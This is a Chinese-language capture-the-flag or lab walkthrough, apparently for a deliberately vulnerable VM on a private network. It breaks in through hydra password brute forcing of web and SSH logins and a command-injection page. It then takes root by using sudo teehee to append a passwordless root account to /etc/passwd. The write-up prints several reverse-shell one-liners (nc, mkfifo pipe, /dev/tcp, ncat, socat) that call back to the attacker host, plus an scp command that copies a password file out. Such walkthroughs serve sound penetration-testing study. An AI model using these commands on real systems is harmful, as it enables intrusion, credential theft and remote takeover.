1. 信息搜集
扫描网段发现主机 192.168.163.135
nmap 扫描端口,发现 http 和 ssh 端口
访问网站尝试登录失败,目录扫描无重要内容,尝试爆破
2. 渗透测试
2.1. 登录密码爆破
bp 抓包查看数据格式,可用 bp 爆破或 hydra 爆破
使用 hydra 爆破
1
hydra 192.168.163.135 -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
获取到密码:happy,登录发现命令执行页面,抓包测试发现存在漏洞
2.2. 反弹 shell
上传反弹 shell 命令
1
2
3
4
5
nc -nv 192.168.163.135 -e /bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -nv 192.168.163.132 4444 > /tmp/f
bash -i >& /dev/tcp/192.168.163.132/4444 0>&1
ncat -nv 192.168.163.132 4444 -e /bin/bash
socat TCP:192.168.163.132:4444 EXEC:/bin/bash
连接成功
查看 home 目录,发现 jim 用户下 old-passwords.bak文件
直接复制或使用 scp 传给 kali,kali 需要开启 SSH 服务,允许密码登录
1
2
3
scp -P 2233 old-passwords.bak kali@192.168.163.132:~
# -P 2233 指定SSH端口2233
# :~ 将文件放到目标机用户家目录
2.3. SSH 爆破
使用 hydra 爆破 SSH
1
hydra 192.168.163.135 -l jim -P old-passwords.bak ssh
密码:jibril04,su jim切换用户成功,查看 mbox 文件发现是邮件,查找是否有其他邮件
在 /var/mail 目录下发现邮件,其中有 charles 发送给 jim 的密码邮件
用户名:charles 注意是小写
密码: ^xHhA&hvim0y
su charles 切换用户成功后,查看用户目录下无内容,sudo -l 尝试提权
2.4. 提权
teehee 提权
1
2
echo "shell::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
su shell
